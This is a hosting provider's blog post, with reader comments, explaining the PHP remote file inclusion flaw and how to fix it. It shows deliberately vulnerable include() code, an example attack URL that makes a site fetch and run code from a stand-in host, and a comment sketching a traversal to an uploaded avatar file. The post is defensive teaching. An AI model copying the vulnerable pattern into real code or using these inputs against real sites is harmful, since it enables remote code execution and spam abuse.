A PHP Include Exploit Explained

We are having a fairly consistent problem with spammers auto-exploiting a very common type of scripting vulnerability that appears on our members’ sites. Unlike most vulnerabilities that stem from a faulty version of some app a lot of people use, this one crops up primarily on sites containing PHP code that people write themselves.

Cleaning up the resulting messes is getting a little tedious and so, even though this is hardly a new exploit, I wanted to write a little bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe.

Let’s start with the problem code. If you’ve written a PHP script on your site that contains code similar to the below, you’re probably vulnerable:

$page = $_GET['page'] . ".php";
include($page);

A lot of people seem to use code like this. If they call this script exploitme.php, then the URL’s for these type of sites wind up looking like this:

http://example.nfshost.com/exploitme.php?page=main
http://example.nfshost.com/exploitme.php?page=contact
http://example.nfshost.com/exploitme.php?page=faq

Then, they put the body of each page into main.php, contact.php, and faq.php. They put the stuff that’s the same on every page in exploitme.php and, presto, instant mini-CMS.

How does this get exploited?

When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this:

http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F

Most people don’t know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn’t even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere that the hacker can put a text file.

The “urhacked.txt” file actually contains whatever PHP commands the attacker wants to execute. Typically, this means sending out tons of spam, which comes from the vulnerable site. Spotting the huge email queue from a site that’s never sent email in its life is usually how we find out about it. But that’s not all they can do; this is an “arbitrary code” exploit. They can do whatever they want using the same privileges the exploited page has. Security researchers call exploits of this type the confused deputy problem.

What makes this particular vulnerability even worse is that it’s possible to detect and exploit automatically. Attackers are smart enough to query search engines for lists of pages with links embedded in the format shown above. All their attack script needs to do is identify the URL of your page and the name of the variable used to hold the target page.

This is a problem because a whole lot of people think “no one bad will ever find or bother trying to exploit my little site.” They don’t realize that it’s it’s no bother; it’s done completely automatically. If you’ve got a vulnerability like this, getting exploited is not “if,” it’s “when.”

Also, the %3F at the end of the attacker’s “page” value decodes into a question mark. This is because the attacker assumes the site will add .php or something to the name they give it to get the filename to load. So the URL that the site winds up loading looks like this:

http://badsite.example.com/urhacked.txt?.php

Assuming that urhacked.txt is a static file, the ? and everything after it will be discarded and the malicious contents will be returned no matter what the site adds at the end.

How to prevent it?

Our default permissions and user/group setup prevent a lot of these from getting worse; by default the attacker cannot execute system commands, create, remove, or (worse) edit files. But the attackers can (and do) send spam. And they can read any files on your site that contain stuff like database passwords you’d probably rather they didn’t have.

Worse, sometimes people irritated with the complexities of getting permissions and ownership exactly right leave things wide open. When that mindset encounters this vulnerability, the resulting damage to the affected site is usually unrecoverable.

So, the first thing one tends to want to do upon finding out about this is to disable the ability of PHP’s include() function to load files from remote sites. PHP allows this by adding the following to .htaccess:

php_flag allow_url_include false

This is a good start, and definitely something to consider, but one of the authors of the Suhosin PHP security patch explained why that is inadequate some years ago.

The second thing that seems obvious is using file_exists() to make sure the file really exists before trying to load it. But file_exists() works on URL’s too. D’oh!

There are two viable ways of eliminating this vulnerability.

The best approach, and the one we recommend, is not to create it in the first place. If you want five PHP pages to share a common header and footer (for example), then reverse the include(). In other words, the URL from the “main” example above:

http://example.nfshost.com/exploitme.php?page=main

changes to reference the main.php file directly:

http://example.nfshost.com/main.php

And then main.php looks like this:

<?php include(".../path/to/header.php"); ?>
The same main page content that was always there.
<?php include("…/path/to/footer.php"); ?>

This way, the exploitme.php script goes away (split into header and footer) and the site never has to trust the user about what belongs inside the very powerful include() statement. Adding a couple of lines (at most) of boilerplate code to each page of content is a small price to pay to entirely eliminate an entire category of security problems.

The second approach is to scrupulously validate the inputs before acting on them. Unfortunately it’s very easy to get this wrong. So to help people get it right, we’re going to walk through the four necessary steps. (All four are essential, skip any one and the whole exercise becomes an elaborate waste of time.) They are:

  1. Examine and reject any input that isn’t entirely formed of “friendly” characters (e.g. letters and numbers).
  2. Put the “content” files (e.g. main.php, contact.php, faq.php) in a special subdirectory of your site’s “protected” directory.*
  3. Always refer to files handled in this way using absolute paths and/or system environment variables.
  4. Test the existence of the file before you include it.

Here’s a simple example:

$page = $_GET['page'];
if (!preg_match("/^[A-Za-z0-9_]+$/", $page))
    throw new BadPageException("Bad character(s)", $page);
$path = "{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$page}.php";
if (!file_exists($path)) 
    throw new BadPageException("Page not found", $page);
include($path);

class BadPageException extends Exception {
    function __construct($err, $page) {
        $page = urlencode($page);
        if (strlen($page) > 128)
            $page = substr($page, 0, 128) . "…";
        parent::__construct("Error \"{$err}\" on \"{$page}\"");
    }
}

Line 1 retrieves the page name from the query string.
Lines 2-3 abort if it isn’t composed entirely of ASCII letters, numbers, and the underscore (_). (Step 1)
Line 4 correlates the page name with a specific filename in a special directory just for these types of pages (Step 2) using an absolute path based on site-independent environment variables (Step 3)
Lines 5-6 abort if the resulting filename doesn’t exist. (Step 4)
Line 7 includes the file.
Lines 9-16 are probably overkill for a “simple” example, but we wanted to show people how to do it right in the real world. When something goes wrong, these lines document the problem. The complexity here comes from “defanging” the requested page name before printing it in an error message. Usually you would want to configure your site to write such messages to its error log, so this protects against 10 pages of gibberish, or codes that will mess up your terminal when you look at it, etc.

So that’s it, one of the most common classes of exploit explored and examined, complete with working sample code. Please, please if you code your own PHP, take a few minutes and check to see if your site suffers from this problem. We waste hours every week cleaning up the messes it causes, and we sure like to spend that time improving the service.

(Commented source available here.)

* For blog guests who may not be members of our service: On our service, each web site has a “public” directory and a “protected” directory. Files in “public” are directly accessible via the web, and files in “protected” are not. The contents of the “protected” directory are, however, accessible to scripts in the “public” directory. I.e., they can be accessed, but only indirectly by accessing the site’s public interface. This makes “protected” a good place to put data, include files, or other stuff that scripts need in order to run, but that you don’t want just anybody to download. The concept and terms are borrowed from object-oriented programming.

12 Comments

RSS feed for comments on this post.

  1. Very interesting.

    By the way, you use ‘urhacked.txt’ in one place and ‘urexploited.txt’ to refer to the same file later.

    Thanks for pointing it out! I’ve corrected it. -jdw

    Comment by Tom Davies — November 5, 2009 #

  2. Wow I had no idea about that. But I’m having a bit of trouble understanding why step one, validating the inputs, isn’t enough. Could you explain why the site files should be in the protected directory?

    Files not meant to be accessed over the web go in the protected directory, so they can’t be accessed over the web. There are other ways to ensure that, like setting up directories and creating .htaccess files that deny all access, or checking in every script to see if it’s been called properly, but those are cumbersome and circuitous ways of accomplishing the same thing. -jdw

    Comment by Middlerun — November 5, 2009 #

  3. While your solution of not creating the problem in the first place is certainly the most effective, it’s not always practical – especially if you have a lot of pages to manage (if you have a major page layout change, for example, you have to change dozens of files with includes rather than the one index.php file).

    Handily, PHP includes the basename() and pathinfo() functions that all but eliminate this issue – not only for remote file inclusion attacks as demonstrated above, but also directory traversal attacks (i.e., vulnerable.php?page=../protected/hiddenFile.txt) and other similar exploits.

    You can then do something very simple like the following:

    
    <?php $template = isset($_GET['page']) ? basename($_GET['page']) : 'default';
    include "../protected/templates/$template.php"; // You should run file_exists() on this path, and 404 out if it returns false
    ?>

    It’s not the cleanest thing in the world (no SEO-friendly URLs, for example), but it’s relatively straightforward, safe, and foolproof.

    Comment by Eric Stern — November 5, 2009 #

  4. But why’s it such a problem if people can access your content files over the web? Aren’t we concerned here with stopping people from including scripts from external websites? Sorry if I’m being thick here, I just don’t see the connection between the two issues.

    The two issues (securing include() and properly locating secondary files) aren’t directly related, but we wanted to provide a “good role model” example of the right way to do it, and part of the right way to do it is to keep the secondary files out of the web-accessible tree. That’s just good site design and good security. -jdw

    Comment by Middlerun — November 5, 2009 #

  5. Eric,

    I disagree with the design of your “straightforward” example so fundamentally that I almost didn’t approve your comment; I feel it’s bad advice and would hate to see anybody say “well that example is shorter and he says it’s just as good, I will use that.”

    However, I did approve it so I could go over why I consider this line of thinking is flawed, because I recognize that a lot of people do think that way. Maybe I can talk some of them out of it. 🙂

    First, to the extent your approach is “straightforward,” that’s because you omitted any form of error detection, validity checking, or problem reporting. All you’ve done is changed a call to preg_match() to basename() and deleted basically everything else. Properly implemented, your example would be exactly the same size and complexity as ours. Conversely, the example code can be equivalently oversimplified:

    $template = isset($_GET["page"]) ? preg_replace("/[^A-Za-z0-9_]/", "", $_GET["page"]) : "default";
    include "../protected/templates/$template.php"; // You should run file_exists() on this path, and 404 out if it returns false

    However, my position is that your example cannot be properly implemented because it discards vital information.

    basename() is designed to return the filename component of a partial or full pathname, not to validate user input (which is ultimately what a URL is). That you get a “safe” result is kind of a side effect of misusing this function. Stylistically, I have a problem with that, but that’s a matter of opinion and I respect that others’ may differ. In any case, you’re really just using basename() as a substitute for preg_replace() to save a few characters.

    But notice again that the example does not use preg_replace(), it uses preg_match(). That is because the goal of that step is not to fix the input, it is to validate it, so appropriate action (e.g. logging, alerting) can be taken if a problem is found.

    basename() and preg_replace() throw away that information; they don’t validate anything, they just silently pave over a lot of problems, both accidental and malicious. That basically helps people who attack your site hide their tracks. Which is bad. There are other problems too, like the way that approach creates an infinite number of “valid” alternate URLs that all produce the same content, but for me, voluntarily cooperating with attackers is the big one. You’re in a situation where you can look at the input and know positively that someone is screwing with you, why on earth would you say “I know they’re screwing with me, now how can I turn their malicious nonsense into a possibly valid input on their behalf?”

    My web sites are important to me. When people attack them, I don’t want to help, but I do want to know about it. The “blindly pave over problems” approach makes that impossible, and consequently it’s a style of programming I consider fundamentally problematic.

    -jdw

    Comment by jdw — November 6, 2009 #

  6. While I don’t do any custom PHP code on my websites, I really appreciate your blog posts like this one. They are always insightful, and it’s nice to know not only a bit of what you guys are seeing behind the scenes but also that there are actually people behind the scenes doing these types of things. I know the second point seems like it might be obvious, but it can be easier than you think to forget. I hope you post more blog entries in the future.

    Comment by Brad — November 7, 2009 #

  7. I usually have an array like this:

    
    <?php
    ## PUT YOUR SITE HEADER HERE
    
    	$pages = array(
    		'home' => 'home.php',
    		'about' => 'about.php',
    		'events' => array(
    			'announcements.php',
    			'calendar.php'
    		),
    		'removeCookies' => 'functionA'
    	);
    
    if(empty($_GET['page']))
    	$_GET['page'] = 'home';
    
    if(isset($pages[$_GET['page']])) {
    	$actions = $pages[$_GET['page']];
    	if(!is_array($actions))
    		$actions = array($actions);
    
    	foreach($actions as $action) {
    		if(is_callable($action))
    			call_user_func($action);
    		else
    			@include("{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$action}.php");
    	}
    }else{
    	echo 'The command you requested is not allowed.';
    }
    
    ## PUT YOUR SITE FOOTER HERE
    ?>
    

    This allows you to keep an “instant mini-CMS” while circumventing the include exploit. Moreover, you are way more flexible — when you take a closer look at the $pages array you’ll see that $pages[‘events’] has two files associated with it and $pages[‘removeCookies’] refers to a function (which will be called if it exists).
    What I’m doing is following a strict whitelisting policy – The user only gets to do what has been whitelisted. This way you don’t have to worry about attackers breaking out of folders or injecting malicious scripts.

    I’m a big fan of the whitelist approach, and we almost mentioned it, but it does take extra effort on an ongoing basis since you have to touch that file every time you add a page. NearlyFreeSpeech uses a similar approach internally, and it’s well worth it, but the extra work still makes it a “no sale” for a lot of people. -jdw

    Comment by Paul Grill — November 8, 2009 #

  8. A couple comments about this:

    I always validate user input to include() [although I don’t have anything hosted on NFSN that needs that right now], but typically my validation consists of looking for slashes rather than your more proactive solution; since you can’t do malicious URL fetches without slashes, what benefit is there to getting rid of anything with any characters you might not want at the risk of characters (underscores, dashes, Unicode) that you might need later?

    Also, if you’re just using a PHP script to put headers and footers onto otherwise static HTML, it might be more worthwhile to do the HTML generation statically, with (say) a Python-script that takes in a folder of flat files and spits out static HTML files. (This is what I do.) Not only does it entirely remove the risk of making a code goof and ending up with an exploitable site, but it also saves a few cents by allowing you to deploy your site as static.

    The include($_GET[“…”]) approach is based on mapping a portion of a URI to a portion of a filename, so you want to make sure you limit yourself to a subset of characters that work well in both places. Sure, if you want to allow other characters, go ahead. Underscore and dash probably won’t cause havoc. Unicode certainly might.

    Static generation is always a great approach, but the include($_GET[“…”]) approach only has any appeal at all because it’s so easy. Static generation tends not to be, hence doesn’t appeal to the same crowd. -jdw

    Comment by dfl — November 8, 2009 #

  9. While the principle of validation over “fixing” is certainly the most security-rigorous solution, insisting on it ignores the previous acknowledgement that the exploit as a whole is something that small-site owners should be equally concerned about fixing. If being probed for the exploit is a web inevitability then you probably don’t want to bother with logs telling you that it’s happened. Early home desktop firewalls used to alert you every time someone on the internet probed you for an exploit you were protected against, but we quickly learned that most users have no use for this information.

    Reading this blog post has drawn my attention to one old site that “validates” using:
    if(file_exists(‘./include/’ . $_GET[‘page’] . ‘.php’))
    Now it turns out that this is vulnerable as far as traversing to the parent directory and try to execute index.php. But since this is harmless, unless there’s a counterexample that allows remote inclusion even if the include path starts with ‘./’ then there’s not much incentive for me to fix it.

    Again, the purpose of our example is to be a good example of good security to people who may not have seen one before. If you look at it with the attitude of “security — why bother?” you probably won’t get much out of it. It only takes a couple of extra lines written one time to get it right.

    With respect to your example, the exploit comes not from remote code, but local uploads. Suppose you have a forum website that allows users to upload avatars. Someone uploads their PHP code as myavatar.gif and then calls your script with &page=../../forum/images/avatars/myavatar.gif and 10,000 people you’ve never heard of get phishing mails queued from your site.

    As far as incentive, you are absolutely right. The people who make this mistake aren’t the ones that suffer for it; we are. If “it’s the responsible thing to do” isn’t a good enough reason, I expect we will have to find a way to start charging for the hours we spend each week cleaning up the resulting messes. -jdw

    Comment by Will — November 10, 2009 #

  10. Jdw, thank you for posting this.

    I used to work in web hosting and it breaks my heart to see exploited code like this everywhere.

    It got to the point that our sysadmins modified the servers to include the url of the script that sent any mail message, making it easier to find and disable. Any mail sent from php included a header similar to:
    X-scripted-mail: web42.example.com/~nesman/htdocs/includes/forms.php

    I’ve seen so much of this that it makes me a very careful coder but I always worry that my best efforts won’t be enough. After all, the people that get exploited thought they had done enough as well.

    Comment by Don Delp — November 11, 2009 #

  11. I’ve been a full-time PHP programmer for the last 10 years or so. What it comes down to is that writing “infrastructure” is hard. There are lots of ways to screw it up and have Bad Things happen. Not to mention that solving the same problem over and over for every new project gets old quickly.

    This is one of the reasons I advocate using frameworks or CMSes for websites. Let an existing product do the heavy lifting so that you can concentrate on writing your business logic. There are literally dozens of free CMS packages out there, and no reason not to start using one right away. (my personal favorite is Drupal, YMMV)

    Comment by Douglas Muth — November 17, 2009 #

  12. There’s at least two reasons in my mind *for some people* not to use an existing CMS. The first is that a lot of the existing ones are fairly monolithic and therefore on NFSN will take up more disk space and so forth, increasing costs. The second is that some of us write our own because that’s what we want to do – whether as a learning experience or just because we can.

    As demonstrated in this blog post, though, if any of us intend to roll our own we really need to pay attention to things like this!

    Comment by James — November 28, 2009 #

Sorry, the comment form is closed at this time.

Entries Feed and comments Feed feeds. Valid XHTML and CSS.
Powered by WordPress. Hosted by NearlyFreeSpeech.NET.

NFSN